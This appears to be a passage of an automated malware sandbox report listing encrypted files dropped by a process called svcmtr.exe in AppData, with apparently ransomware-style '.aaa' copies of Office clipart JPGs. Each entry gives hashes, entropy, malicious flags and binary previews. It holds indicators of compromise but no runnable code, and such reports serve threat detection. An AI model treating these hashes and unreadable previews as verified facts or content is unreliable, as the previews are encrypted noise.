                                                                                                                          SSDEEP:1536:gIRZiZbtUSdnKXuboePFmkX/VqRlLGEO1Xv4vlJKBIo2ZUQWVnGiwhVx5aA8:bynToeEkPIGJ1XwvmIqQW0zhVxV8
                                                                                                                          MD5:3CFB9A4EC67395CB74D160A031907066
                                                                                                                          SHA1:DCBEC020690129ABDE37DDB7F91391A151B207AE
                                                                                                                          SHA-256:7495D175230D48ECA45942AF13FD965FAE8E2F33A32D780D7F47317BF002B5CC
                                                                                                                          SHA-512:4495C0030ABAE7DFB9D5E6D9E2BDCEA21079AF3DF35EBCADB605A35C7C4CC26B94151ADBA7F9CE21DA35C9A85635AA43D7C7A8AE0588147BE38DD3F4D417E627
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...c//(.#...;...aBw.......}.9N)B.W..e1.U..3.....^.&.1.. ......Q.T<...]..mg.'..W%...Y...!....h...=..M..GL....y9.I.q8b....n..r..;.......B....N.x.?.<....*...3w.....Q....m.Ql.B......K=........Y.+...............H.]..U...Z.....F...m.tk.>.jP{%..5.*.........."....l..l.Y2.u....J........K.^.M..7./o.P.j.|v..0.v...e..X.##..q..kDbuP.2'8.......Gt...I._.[j.8.5...H+.@%...e.k...|$?#.AE.!^.B.<..ZRH...\.Y9.L.Z..$!....<........#B.e.5..C...:\D|0.(.}.........T....2..^L...9..r!x~...p...{.w..t.<,O..=_X...V.g..=t.....6Y.+[.J.......#D..ZM.......4.z2/......H:W..3W....zd...N......vg...2?..9.$.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):136030
                                                                                                                          Entropy (8bit):7.998663148204875
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:kgJsdSaSE/MPbY9JeL97PnHgy7ChF3ncSr24xcq2:kQISLE/wbY9JoDoc6z2
                                                                                                                          MD5:1BD210F74E8EFF8B74D628334FE06D2A
                                                                                                                          SHA1:59557C07D970613B1DA6058E53688A75AED18ED4
                                                                                                                          SHA-256:E3BF04C53343616AE32F4F1979653DC1FB77589D1CC4350CC72DDDB2ECACE0D6
                                                                                                                          SHA-512:7CD5B09F244CCE274FC60B14DF3C423385C66571B6252E1F08980A06772F94F16CBDEE2155AC6DC4D1DA09B1064ACD1FE325EB3E915704FA0C61A4161B8B5E0E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....P...6.+.S.5a....._.Go.nx..P........HB.0+...R...A..!.O..o.c....Ze.$4^s.T.PP#*!.V.....7.......!.C,l|..'.!.}.9..PD...........!:....~..G.%ivh...r.P..(...J......./.S.-.t.)..x.S~.|F.)..k^.r..IB.r.q~..y.hF...IlQD.........|...z..w..u..3.Vm&.Js.......*3Q4..........lfc9.y'.....q-k.Rc@g.].0....|......VQ...E7.......sPF#...R7p".r...?P.7x..i...Gfu...S.}"......i.F@p.V<?.uDO{O......1..c..2..L..9.B.....)H.p{...h..5}.R..kNn4.c\n.......&.......D....Y..9'...#..R...UT../.....y...T..Nb..K\...};"..b.G[iG..$:.....K.5p'..~.=..T*..9'vD.*]...-..I$.R.....M.......K..`.........c.:A ...:n

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):136030
                                                                                                                          Entropy (8bit):7.998663148204875
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:kgJsdSaSE/MPbY9JeL97PnHgy7ChF3ncSr24xcq2:kQISLE/wbY9JoDoc6z2
                                                                                                                          MD5:1BD210F74E8EFF8B74D628334FE06D2A
                                                                                                                          SHA1:59557C07D970613B1DA6058E53688A75AED18ED4
                                                                                                                          SHA-256:E3BF04C53343616AE32F4F1979653DC1FB77589D1CC4350CC72DDDB2ECACE0D6
                                                                                                                          SHA-512:7CD5B09F244CCE274FC60B14DF3C423385C66571B6252E1F08980A06772F94F16CBDEE2155AC6DC4D1DA09B1064ACD1FE325EB3E915704FA0C61A4161B8B5E0E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....P...6.+.S.5a....._.Go.nx..P........HB.0+...R...A..!.O..o.c....Ze.$4^s.T.PP#*!.V.....7.......!.C,l|..'.!.}.9..PD...........!:....~..G.%ivh...r.P..(...J......./.S.-.t.)..x.S~.|F.)..k^.r..IB.r.q~..y.hF...IlQD.........|...z..w..u..3.Vm&.Js.......*3Q4..........lfc9.y'.....q-k.Rc@g.].0....|......VQ...E7.......sPF#...R7p".r...?P.7x..i...Gfu...S.}"......i.F@p.V<?.uDO{O......1..c..2..L..9.B.....)H.p{...h..5}.R..kNn4.c\n.......&.......D....Y..9'...#..R...UT../.....y...T..Nb..K\...};"..b.G[iG..$:.....K.5p'..~.=..T*..9'vD.*]...-..I$.R.....M.......K..`.........c.:A ...:n

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41902
                                                                                                                          Entropy (8bit):7.994987557161011
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GBa0hNkeZj1WN5uwOnAVBhyF+tEL5YaWA7bXUqHDs+it7ZkdNBhvLy8U:6kefJwO0BhG+Q5GIbEqHDs9FZknG8U
                                                                                                                          MD5:D2F9B8D5D5C66EB20394376B5A861BAF
                                                                                                                          SHA1:49C7947ED6716F27D8895BC54E6786015839812A
                                                                                                                          SHA-256:9DF5D3536D1B2D5C89D8E937061DC37666C6BF05C5FF0B2F0D315FAC0986D589
                                                                                                                          SHA-512:E4AE9C7B7855D92C2868E8EB705D2C892930C77FACC1BD535B9E18E56B576D7C103EEFCB5F37B99FD887BE4206B34D07B1DF59EAD15F58B10D6D9283595DD34A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......h.=..gGk.......T...G.x$....A5G.+.^.R.u.1(..vru0&..............M..W...WDv.......,s...._|.a......6..:....,J.;.z..!....h.Y2v.......b.L.|..Z!...`.|HF;.....H..R~.p3HO...%W]...l.........&{...K.s...qY...p(v..B9x..q....q........[v..X4.Y.......X....3...a#...(D.HK.Y.~l.O..$..N&..f."%~..TO....8.I..1..E1.,.W5...E.m...'Ha-=.....`.*.UVJ...-....Y~.)C.\..........v.oi.......^z.C.w.o.+....),.=..,.U.d.....pF.~...l..^z.2...BW)..R7..f..w[Zy.. ^....5PP..].-N...B......H=.fVa.A.&w3.,.Fyp.n. 3.v2..".=;qv.X.F.Eo.|HH...;........A...D.......U. .S.6n..l..xf.....g.. c......:..`.e>....*W.1..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41902
                                                                                                                          Entropy (8bit):7.994987557161011
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GBa0hNkeZj1WN5uwOnAVBhyF+tEL5YaWA7bXUqHDs+it7ZkdNBhvLy8U:6kefJwO0BhG+Q5GIbEqHDs9FZknG8U
                                                                                                                          MD5:D2F9B8D5D5C66EB20394376B5A861BAF
                                                                                                                          SHA1:49C7947ED6716F27D8895BC54E6786015839812A
                                                                                                                          SHA-256:9DF5D3536D1B2D5C89D8E937061DC37666C6BF05C5FF0B2F0D315FAC0986D589
                                                                                                                          SHA-512:E4AE9C7B7855D92C2868E8EB705D2C892930C77FACC1BD535B9E18E56B576D7C103EEFCB5F37B99FD887BE4206B34D07B1DF59EAD15F58B10D6D9283595DD34A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......h.=..gGk.......T...G.x$....A5G.+.^.R.u.1(..vru0&..............M..W...WDv.......,s...._|.a......6..:....,J.;.z..!....h.Y2v.......b.L.|..Z!...`.|HF;.....H..R~.p3HO...%W]...l.........&{...K.s...qY...p(v..B9x..q....q........[v..X4.Y.......X....3...a#...(D.HK.Y.~l.O..$..N&..f."%~..TO....8.I..1..E1.,.W5...E.m...'Ha-=.....`.*.UVJ...-....Y~.)C.\..........v.oi.......^z.C.w.o.+....),.=..,.U.d.....pF.~...l..^z.2...BW)..R7..f..w[Zy.. ^....5PP..].-N...B......H=.fVa.A.&w3.,.Fyp.n. 3.v2..".=;qv.X.F.Eo.|HH...;........A...D.......U. .S.6n..l..xf.....g.. c......:..`.e>....*W.1..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6750
                                                                                                                          Entropy (8bit):7.959292758147358
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gowl2bllyjWj9R1aHj+dQvSliiTG8zwU5PXKK:GTwSijz12jFqQiG80U5fKK
                                                                                                                          MD5:E917BDDEFF73DAD8A0C824B7AD0E44A6
                                                                                                                          SHA1:CEA18F94B57BC48A5E80CD3F5C2E0778C9D0F4A7
                                                                                                                          SHA-256:E2BF937345313ECE2F192810ADABF416066A734C21574D8F01C4B52C243162E2
                                                                                                                          SHA-512:4681A32A3FAD40743A14C0AE426D07CD595ECB267C46E3C7E050E42940A9000F96AD4026BBEFDAD78A194CC34853FB3CA34B71421CC23FDA789FA280A8F601A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....p..n.e.z.e.^.....<A..n>!....#-r..}......_.U....g........w...Ea..*%......x...P.....>..=[1\.3x..2...8.K.PV.<U.-.6E.Q:..pg....L...=.|.".&..-.e.R.:>... .....'..x/.t..u.T.l.!.1...^.Y.]kZz...(>....;]......k.D........xG....n.~.....3..:3....6U[wte!.D....'.4..X.x/X;y..1.3j.j.9.Y^....9.N...3Wt..y.Z..R.o....k......8.NK.L..>.b...D.!...g.{IW+..HMe@...*..%GV...'....W.{..yw..lVe.:....1....... f.HsS.....+..z....".E.....3.D0...L.;Dk..Uk5,&.a...q..u.,...*...O.....wf.MR.XS.....8.Cm.X .BQ.H...b.A..1.....|..,.~.QL..p....9...RN...clQ..".+K.\......./....N....izgJ-...`.....q.......

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6750
                                                                                                                          Entropy (8bit):7.959292758147358
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gowl2bllyjWj9R1aHj+dQvSliiTG8zwU5PXKK:GTwSijz12jFqQiG80U5fKK
                                                                                                                          MD5:E917BDDEFF73DAD8A0C824B7AD0E44A6
                                                                                                                          SHA1:CEA18F94B57BC48A5E80CD3F5C2E0778C9D0F4A7
                                                                                                                          SHA-256:E2BF937345313ECE2F192810ADABF416066A734C21574D8F01C4B52C243162E2
                                                                                                                          SHA-512:4681A32A3FAD40743A14C0AE426D07CD595ECB267C46E3C7E050E42940A9000F96AD4026BBEFDAD78A194CC34853FB3CA34B71421CC23FDA789FA280A8F601A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....p..n.e.z.e.^.....<A..n>!....#-r..}......_.U....g........w...Ea..*%......x...P.....>..=[1\.3x..2...8.K.PV.<U.-.6E.Q:..pg....L...=.|.".&..-.e.R.:>... .....'..x/.t..u.T.l.!.1...^.Y.]kZz...(>....;]......k.D........xG....n.~.....3..:3....6U[wte!.D....'.4..X.x/X;y..1.3j.j.9.Y^....9.N...3Wt..y.Z..R.o....k......8.NK.L..>.b...D.!...g.{IW+..HMe@...*..%GV...'....W.{..yw..lVe.:....1....... f.HsS.....+..z....".E.....3.D0...L.;Dk..Uk5,&.a...q..u.,...*...O.....wf.MR.XS.....8.Cm.X .BQ.H...b.A..1.....|..,.~.QL..p....9...RN...clQ..".+K.\......./....N....izgJ-...`.....q.......

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7742
                                                                                                                          Entropy (8bit):7.968467131322745
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Go25BRjVYJDxgoacFSoiYqdteeuqubfVWDYtCch0G2:GThy1mc2dt+qgfY9nG2
                                                                                                                          MD5:6FBA08C71C00FA74C5086A701866BA75
                                                                                                                          SHA1:64447A24CC590AEA619894BAE44298DE19596841
                                                                                                                          SHA-256:A41E05FE95B37D4AB26AD2D2DFDB3D329373061FEFB5BEE1AEFE32690697F7C8
                                                                                                                          SHA-512:974F46151DF1BF3FC2A63826629490095A59914EF1D16197DDA51B457A618DD9D21F1AA761B25FA54F43596B1BC57CF301890600F61F0993656C724733434ACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..~..0...@N.............`@..o..n.~....2.Wu...-<...\.T..^...4j.XoiT,.6NO....a...caY....\._....'j..{}.....|dJ..R.).r.............~....Jt...g/......+...y...e.....x..+o_s.J..2......,...Lf.W.G]..I"...kH..@......p....'R.<..U...w...>.*...";]T..XV%AU...(....9..w.'o;..'....i\ .f...A8{%5S.h...........f.%.{pa'..(e.x...(..(....Yi.I.).y.f.............T.9.T.C...EJ.q.!.....Q_....Kcs...Q.q.....[.....~.H.h(.Xz...X@...(<d.c.cu...-/e...^-yO7m....b.Yv......t..@J....ie.-H...H.....^..!.xA.u.j.}...j..h9.N...L...0..&._l..ok'...).4.dNf.....<.5.......K..Ru....[$_..1...UXg.....c..`..7.J~7......

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7742
                                                                                                                          Entropy (8bit):7.968467131322745
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Go25BRjVYJDxgoacFSoiYqdteeuqubfVWDYtCch0G2:GThy1mc2dt+qgfY9nG2
                                                                                                                          MD5:6FBA08C71C00FA74C5086A701866BA75
                                                                                                                          SHA1:64447A24CC590AEA619894BAE44298DE19596841
                                                                                                                          SHA-256:A41E05FE95B37D4AB26AD2D2DFDB3D329373061FEFB5BEE1AEFE32690697F7C8
                                                                                                                          SHA-512:974F46151DF1BF3FC2A63826629490095A59914EF1D16197DDA51B457A618DD9D21F1AA761B25FA54F43596B1BC57CF301890600F61F0993656C724733434ACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..~..0...@N.............`@..o..n.~....2.Wu...-<...\.T..^...4j.XoiT,.6NO....a...caY....\._....'j..{}.....|dJ..R.).r.............~....Jt...g/......+...y...e.....x..+o_s.J..2......,...Lf.W.G]..I"...kH..@......p....'R.<..U...w...>.*...";]T..XV%AU...(....9..w.'o;..'....i\ .f...A8{%5S.h...........f.%.{pa'..(e.x...(..(....Yi.I.).y.f.............T.9.T.C...EJ.q.!.....Q_....Kcs...Q.q.....[.....~.H.h(.Xz...X@...(<d.c.cu...-/e...^-yO7m....b.Yv......t..@J....ie.-H...H.....^..!.xA.u.j.}...j..h9.N...L...0..&._l..ok'...).4.dNf.....<.5.......K..Ru....[$_..1...UXg.....c..`..7.J~7......

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6414
                                                                                                                          Entropy (8bit):7.950984719923816
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoO2yvsAJ8KuBIWfENFZMMK2XnkWJafjMqqoPn37i:Gx8i8KGnkXkWJafjMt8n37i
                                                                                                                          MD5:655E4E8119977B99715BFC0B2C68C160
                                                                                                                          SHA1:9D111D6D72B9FE88B542A2B5EEF0970B10A37D5B
                                                                                                                          SHA-256:5B259AEDAD77C8B461F0EC35078F5B049CB31781458C68470A245A9C52EEBFFF
                                                                                                                          SHA-512:C77EC28C3620097B1EEDFF944FA9E4F9F2F96D829773B7EFA4C4A080FEAB8A84ED93D43CB1A8697C98B4218C43C65B8BDF97C2D5D19B1BD2FEAE4068E20A7424
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..{.....gJ/.fb.nd...y.....C.Z..-L.Brb....Dw...H.{n.B.A0.-.>.!.....u7y..r...)?..l.....kTiOxf)..;............G..tx...^j...g..!...~...<Bsus]..Eu....o....k....x.g...t.U.K...qK...7.z.+.!..-.9..eP.D...%<.!.&...t..`...|...........`*..U.......T.../.5..9.cb)%..OO}s.C..:.....\.....+-..d../....&..._3...#U.o]dU.f........h.H...?.H~.*....N..B4.S.Z.e...). ..j..s....1...V.qk.Q.....-..U&...9.......{...l.../$....N...9...n...e....%..{..R....;.q'.&P..<.y.<..I.../..S.xq...I. p.H.;%).L....~ u.....%.8..~.....(.E..L.H#.5Q...5...~......P...<.../..q.Q+.m.Puu....)..q.......j.{.:..O.d...).....h.q..OA.1

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6414
                                                                                                                          Entropy (8bit):7.950984719923816
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoO2yvsAJ8KuBIWfENFZMMK2XnkWJafjMqqoPn37i:Gx8i8KGnkXkWJafjMt8n37i
                                                                                                                          MD5:655E4E8119977B99715BFC0B2C68C160
                                                                                                                          SHA1:9D111D6D72B9FE88B542A2B5EEF0970B10A37D5B
                                                                                                                          SHA-256:5B259AEDAD77C8B461F0EC35078F5B049CB31781458C68470A245A9C52EEBFFF
                                                                                                                          SHA-512:C77EC28C3620097B1EEDFF944FA9E4F9F2F96D829773B7EFA4C4A080FEAB8A84ED93D43CB1A8697C98B4218C43C65B8BDF97C2D5D19B1BD2FEAE4068E20A7424
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..{.....gJ/.fb.nd...y.....C.Z..-L.Brb....Dw...H.{n.B.A0.-.>.!.....u7y..r...)?..l.....kTiOxf)..;............G..tx...^j...g..!...~...<Bsus]..Eu....o....k....x.g...t.U.K...qK...7.z.+.!..-.9..eP.D...%<.!.&...t..`...|...........`*..U.......T.../.5..9.cb)%..OO}s.C..:.....\.....+-..d../....&..._3...#U.o]dU.f........h.H...?.H~.*....N..B4.S.Z.e...). ..j..s....1...V.qk.Q.....-..U&...9.......{...l.../$....N...9...n...e....%..{..R....;.q'.&P..<.y.<..I.../..S.xq...I. p.H.;%).L....~ u.....%.8..~.....(.E..L.H#.5Q...5...~......P...<.../..q.Q+.m.Puu....)..q.......j.{.:..O.d...).....h.q..OA.1

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40030
                                                                                                                          Entropy (8bit):7.9955595085888245
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GnJViSZnoUgwm4ghfn6bfuwWlwZ1lkIG6E/SOJuHTIXLmWE4G4n:6GUnqpCjuMf+ItdOJuFXJ4n
                                                                                                                          MD5:E34E4F808A1077C5CF6AAE112BB746BC
                                                                                                                          SHA1:DD72D88DC81845260F1EA50D5FDEDA09DBBB4207
                                                                                                                          SHA-256:A2DA3BEB8F152F543D791CBA20F9B17DADF9F1AA6DA7063783399099C344F925
                                                                                                                          SHA-512:7AF4907FB514E0FFF52408D0DA4A7550014DEF8B409D5685E7C6C81F0B8D0AE8B597AD08DCDB6FB9842E7B0E67646E115D5FFBFB4439279E5F7A117B6380411F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..R..B..GA..LO=.......Yh.v'K..7E..f..RH..*m..>|.].oj....-...i.~...e...0w............K.cB.....}}#.4......-.I.K..A#*...."...\...n..D2Gt.7Z.Q.l2.v?.;W.4J...f....A\..2....DI.kCm.(.....-.X...cDv.-.N...E......fp_g%...s..q9X]...@.~3bh..7.5rR....h...E..&B..O..0....:d.].....a...ZpV.7..h.O&]...<-.p...".6*O..L....{._...A.t......mr.,...=.(.Xc.C.,.Xh.\.Bp....Wh.g.......}.Y./.;...,z...!...,....l.._..2..Z1F.....+1....x.,:s._.Cx.vE."..dk4.~.<5Y">.0&.v.&\.'>..T..RW$.Q....y.......Q'"...TeQ../.....)....M....IVE}.....J.y...:./....,..`..%}s...N/x..w.V.b....I|D-....p.g9...<.. %.q-o...=.z.H.qb.....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40030
                                                                                                                          Entropy (8bit):7.9955595085888245
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GnJViSZnoUgwm4ghfn6bfuwWlwZ1lkIG6E/SOJuHTIXLmWE4G4n:6GUnqpCjuMf+ItdOJuFXJ4n
                                                                                                                          MD5:E34E4F808A1077C5CF6AAE112BB746BC
                                                                                                                          SHA1:DD72D88DC81845260F1EA50D5FDEDA09DBBB4207
                                                                                                                          SHA-256:A2DA3BEB8F152F543D791CBA20F9B17DADF9F1AA6DA7063783399099C344F925
                                                                                                                          SHA-512:7AF4907FB514E0FFF52408D0DA4A7550014DEF8B409D5685E7C6C81F0B8D0AE8B597AD08DCDB6FB9842E7B0E67646E115D5FFBFB4439279E5F7A117B6380411F
                                                                                                                          Malicious:true
